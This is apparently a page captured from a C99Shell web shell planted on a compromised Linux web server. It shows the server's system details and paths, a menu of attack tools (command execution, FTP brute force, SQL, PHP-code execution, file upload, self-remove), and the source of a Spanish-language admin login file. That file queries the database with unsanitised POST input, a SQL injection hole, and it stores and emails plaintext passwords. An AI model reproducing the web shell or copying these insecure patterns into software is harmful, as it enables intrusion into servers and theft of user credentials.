!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/home/memoriacel/public_html/2018/panel/   drwxr-xr-x
Free 985.28 GB of 1859.98 GB (52.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (7.64 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
$pagina_actual
="inicio";
require_once(
"includes/config.php");
require_once(
"includes/funciones.php");

$mensaje="";

if (isset(
$_POST["email_recuperar"])){
    
$email=$_POST["email_recuperar"];//cadena_segura($_POST["email_recuperar"],150);
    
$query_usuario=$mysqli->query("
        SELECT u.id, u.nombre, u.apellido, u.email, u.clave
        FROM usuario u       
        WHERE u.email='"
.$email."'
        "
);
    if (
mysqli_num_rows($query_usuario)>0) {
        
$row mysqli_fetch_assoc($query_usuario);

        
$subject "Recuperar datos de acceso catalogo online";
        
$headers "From: " $email_para_enviar "\r\n";
        
$headers .= "Reply-To: " $array_emails_consultas[0] . "\r\n";
        
$headers .= "MIME-Version: 1.0\r\n";
        
$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n"
        
$message_vendedor '<html style="margin:0;padding:0;"><body style="margin:0;padding:0;">';
    

        
$contenido_email='
  
    <img src="'
.$url_instalacion.'contenido/logo_e-mail.jpg" alt="'.$nombre_empresa.'" style="text-align:left"/>
    <h2 style="font-size: 16px;
    text-align:left;
    color: #000;
    ">Recuperación de contraseña</h2>          
          
    <p style="color:#494949;
    margin-bottom:2px;
    font-weight:bold;
    ">Usuario: '
.$row["email"].'</p>

    <p style="color:#494949;
    margin-bottom:2px;
    font-weight:bold;
    ">Clave: '
.$row["clave"].'</p>
    
    <p style="text-align:center;
    color:#494949;
    font-size:14px;
    ">Gracias por utilizar nuestros servicios</p>
    <p style="font-size:14px;
    font-weight:bold;
    color:#494949;
    ">'
.$nombre_empresa.'</p>
    
        '
;

        
$message_vendedor .= $contenido_email;    
        
$message_vendedor .= '</body></html>'

        
mail($row["email"], $subject$message_vendedor$headers);

        
$mensaje="Revise su casilla de correo";
    } else {
        
$mensaje="Email no registrado";
    }
}

if (isset(
$_POST["email"])){
    
$email=cadena_segura($_POST["email"],150);
    
$password=cadena_segura($_POST["password"],150);
    
$query_usuario=$mysqli->query("
        SELECT id, nivel, nombre, id_empresa, fecha_sincronizacion
        FROM usuario 
        WHERE email='
$email
        AND clave='
$password'
        AND nivel>=1
        "
);
    if (
mysqli_num_rows($query_usuario)>0) {
        
$row mysqli_fetch_assoc($query_usuario);
        
$_SESSION["id_usuario"]=$row["id"];
        
$_SESSION["id_empresa"]=$row["id_empresa"];
        
$_SESSION["nombre_usuario"]=$row["nombre"];
        
$_SESSION["nivel_permiso_usuario"]=$row["nivel"];
        
$_SESSION["fecha_sincronizacion"]=$row["fecha_sincronizacion"];

        
//$array_nuevos_productos = json_decode(file_get_contents($url_sincronizacion_productos),true);

        //print_r($array_nuevos_productos);

        //$_SESSION["array_nuevos_productos"]=$array_nuevos_productos;

/*
        $result=$mysqli->query("
        SELECT id
        FROM producto
        ");  

        while ($item=mysqli_fetch_assoc($result)){
            unset($_SESSION["array_nuevos_productos"][$item["id"]]);
        }
        */

        //actualizar productos

        
header('Location: panel.php');
    } else {        
        
$mensaje="usuario o contrase&ntilde;a incorrecta";
    }
}

$result=$mysqli->query("
SELECT titulo, color_titulo, color_boton, texto_footer, color_texto_footer
FROM datos_panel
"
);
$datos_panel=mysqli_fetch_assoc($result);

?><!DOCTYPE html>
<html lang="es">

<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">

    <title>Panel Administrador</title>
    
    <? include('includes/tipografias.php');?>

    <!-- Bootstrap Core CSS -->
    <link href="bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- MetisMenu CSS -->
    <link href="bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">

    <!-- Custom CSS -->
    <link href="dist/css/sb-admin-2.css" rel="stylesheet">
    <link href="css/cds.css" rel="stylesheet" type="text/css">

    <!-- Custom Fonts -->
    <link href="bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <style>
.login-panel input[type=submit].btn-block{
    background-color: #<?=$datos_panel["color_boton"]?>;
    border-color: #<?=$datos_panel["color_boton"]?>;
}
.panel-body {
    padding: 15px;
}
    </style>

</head>

<body style="background-image: url(../contenido/fondo_panel_inicio.jpg);
    background-size: cover;
    background-position: center;
    background-repeat: repeat-y;
    height: 100vh;
    ">

    <div class="container">
        <div class="row">
            <div class="col-md-4 col-md-offset-4">
                <div class="login-panel panel panel-default">
                    <div class="panel-heading">
                        <img src="../contenido/logo.png" class="img-responsive"/>
                        <h3 style="color:#<?=$datos_panel["color_titulo"]?>"><?=utf8_encode($datos_panel["titulo"])?></h3>
                    </div>
                    <div class="panel-body">
                        <form role="form" method="post">
                            <fieldset>
                                <div class="form-group input-group">
                                    <span class="input-group-addon"><i class="fa fa-user"></i></span>
                                    <input type="text" class="form-control" placeholder="" name="email" autofocus>
                                </div>
                                
                                <div class="form-group input-group">
                                    <span class="input-group-addon"><i class="fa fa-lock"></i></span>
                                    <input class="form-control" placeholder="" name="password" type="password">
                                </div>
                                <? if ($mensaje!=""){?>
                                <p class="text-danger text-center"><?=$mensaje?></p>
                                <? }?>
                                <!-- Change this to a button or input when using this as a form -->
                                <input type="submit" class="btn btn-lg btn-success btn-block" value="Ingresar">
                            </fieldset>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <footer class="container pie-login">
        <div class="row">
            <div class="col-md-6">
                <p style="color:#<?=$datos_panel["color_texto_footer"]?>" class="text-center"><?=$datos_panel["texto_footer"]?></p>
            </div>
            <div class="col-md-6">
                <p class="text-center"><a class="cds" href="http://www.creadoresdesitios.com.ar" target="_blank">Desarrollo Web / Creadores de Sitios</a></p>
            </div>
        </div>      
    </footer>

    <!-- jQuery -->
    <script src="bower_components/jquery/dist/jquery.min.js"></script>

    <!-- Bootstrap Core JavaScript -->
    <script src="bower_components/bootstrap/dist/js/bootstrap.min.js"></script>

    <!-- Metis Menu Plugin JavaScript -->
    <script src="bower_components/metisMenu/dist/metisMenu.min.js"></script>

    <!-- Custom Theme JavaScript -->
    <script src="dist/js/sb-admin-2.js"></script>

</body>

</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0009 ]--